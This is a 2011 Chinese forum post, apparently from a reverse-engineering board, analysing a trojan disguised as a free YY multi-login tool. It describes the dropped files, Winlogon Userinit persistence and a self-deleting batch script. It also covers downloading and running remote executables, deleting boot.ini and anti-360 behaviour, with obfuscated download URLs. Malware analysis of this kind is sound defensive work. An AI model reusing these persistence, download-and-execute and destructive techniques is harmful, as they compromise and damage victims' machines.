-
-
[原创]YY神马免费版
-
发表于:
2011-10-2 17:45
8519
-
其实吧,身在**,最不可信的用词莫过于“免费”了。我只是想找个东西分析一下YY的登录协议自己写个多开去捧捧某人的频道而已。
下载下来是一个RAR,解压缩。
然后是一个EXE,拖进OD,这个一个NSIS安装程序,拖进Universal Extractor解包。
然后是2个EXE,一个是同名EXE,另一个是kk1.exe,顿时我就黑化了……
把kk1拖进OD,看起来像ASM的杰作。然后例行释放了UpdateUsp.dll,usp10.dll,SystemUpdate.exe,当然肯定是在System32里面。话说写教程的时候按错键了,等下又要重装VM了。唉……
然后在写SystemUpdate.exe的时候从kk1.exe的尾部解码了一个神奇的字符串:
OOOOOO20aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0p5J5x3K6c8Q4x3V1k6&6P5g2)9J5k6i4c8^5N6q4)9%4b7@1y4Q4x3@1q4Q4y4f1y4i4d9f1&6p5e0#2N6e0i4K6g2o6j5X3!0G2N6q4)9J5k6h3W2F1K9b7`.`.
CCCCCCdbcK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4y4q4)9J5k6e0p5K6z5g2)9J5k6e0p5H3y4#2)9J5k6e0t1@1x3W2)9K6b7e0p5J5x3K6c8Q4x3V1k6Y4k6i4c8Q4x3X3g2S2M7%4l9`.
VVVVVVkk1
打开一个IE:
3efK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0p5J5x3K6c8Q4x3V1k6&6P5g2)9J5k6i4c8^5N6q4!0q4y4g2)9^5y4W2)9^5y4g2!0q4y4g2!0m8c8g2!0n7z5g2!0q4c8W2!0n7b7#2)9&6b7b7`.`.
6a7K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6&6P5h3#2Q4x3X3g2W2P5r3f1`.
601K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6I4M7h3#2Q4x3X3g2W2P5r3f1`.
b33K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6V1L8X3j5I4i4K6u0W2k6i4S2W2
026K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6U0M7e0q4Q4x3X3g2W2P5r3f1`.
e0bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6Y4L8o6q4Q4x3X3g2W2P5r3f1`.
371K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6%4L8%4M7I4i4K6u0W2k6i4S2W2
6edK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6@1L8o6u0Q4x3X3g2W2P5r3f1`.
e2bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6I4M7i4y4Y4i4K6u0W2k6i4S2W2
17bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6I4M7h3S2^5x3g2)9J5k6h3g2^5k6b7`.`.
58dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6*7P5o6u0Q4x3X3g2W2P5r3f1`.
7f1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6Y4K9W2)9J5k6h3g2^5k6b7`.`.
87aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0b7K6x3U0q4Q4x3V1k6Y4M7W2)9J5k6h3g2^5k6b7`.`.
真的没什么好说的……
然后我们来看SystemUpdate.exe
在HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogo下面的:C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\Tasks\conime.exe
其次把自己复制到%windir%/tasks/conime.exe然后执行
然后创建一个dll.bat,内容如下:
@echo off
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq
@del 3596799a1543bc9f.aqq
@del "C:\SystemUpdate.exe"
@del dll.bat
@exit
然后真的Exit了,当然这只是发现自己不是在C:\WINDOWS\Tasks里面的时候执行的部分。
然后来看是的时候得流程:
果断的读取附加字节。
OOOOOO11bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0p5J5x3K6c8Q4x3V1k6&6P5g2)9J5k6i4c8^5N6q4)9%4b7@1y4Q4x3@1q4Q4y4f1y4i4d9f1&6p5e0#2N6e0i4K6g2o6j5X3!0G2N6q4)9J5k6h3W2F1K9g2)9J5y4X3&6T1M7%4m8Q4x3@1t1`. = UrlDownloadFileA 30bK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5I4z5g2)9J5k6e0p5@1y4#2)9J5k6e0p5K6y4q4)9J5k6e0p5$3y4q4)9K6b7e0p5J5x3K6c8Q4x3V1k6&6P5g2)9J5k6i4c8^5N6q4)9J5k6q4)9J5y4X3N6@1i4K6y4n7b7#2)9K6b7g2)9#2b7#2N6u0e0V1c8a6g2#2y4Q4y4f1y4T1L8$3!0@1i4K6u0W2K9h3&6A6
然后依次下载里面的那些exe,然后删除boot.ini
CCCCCC30dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4y4q4)9J5k6e0p5K6z5g2)9J5k6e0p5H3y4#2)9J5k6e0t1@1x3W2)9K6b7e0p5J5x3K6c8Q4x3V1k6Y4k6i4c8Q4x3X3g2S2M7%4l9`. VVVVVVkk1 的用法:
bdfK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5%4y4q4)9J5k6e0p5K6z5g2)9J5k6e0p5H3y4#2)9J5k6e0t1@1x3W2)9K6b7e0p5J5x3K6c8Q4x3V1k6Y4k6i4c8Q4x3X3g2S2M7%4m8Q4x3@1k6E0j5h3y4Q4x3@1b7H3x3q4)9J5k6o6m8U0i4K6u0V1x3U0W2Q4x3X3b7^5j5g2)9J5k6o6q4U0i4K6u0V1j5$3g2Q4x3U0k6$3k6i4u0Q4x3@1c8C8K9K6q4Q4x3U0k6H3L8Y4g2E0i4K6y4p5x3U0V1`.
这么明了的字符串就不解释了吧。
提交之后就返回了五个字符“addok”如果最后pnum不是29的话,那就是“updateok”
然后休息一会儿继续上面2步
下面来看UpdateUsp.dll,说真的,我不相信一个几十K的exe能释放出一个几百K的dll,所以它的源文件名告诉我这个是原始的usp10.dll。
然后是释放出来的6.5K的usp10.dll(NewDownload.dll):
首先看看,是360娘加载了我么?是的话就一起死吧!
然后是Explorer加载了我么?不是的话,那就算了吧。是的话就建一个线程。
线程:
使用HKLM\Software\360Safe\menuext\LiveUpdate360下的Application键值查找SoftMgr.exe,但并没有感染。
然后执行SystemUpdate.exe和360的SoftMgr.exe
[培训]科锐逆向工程师培训第53期2025年7月8日开班!
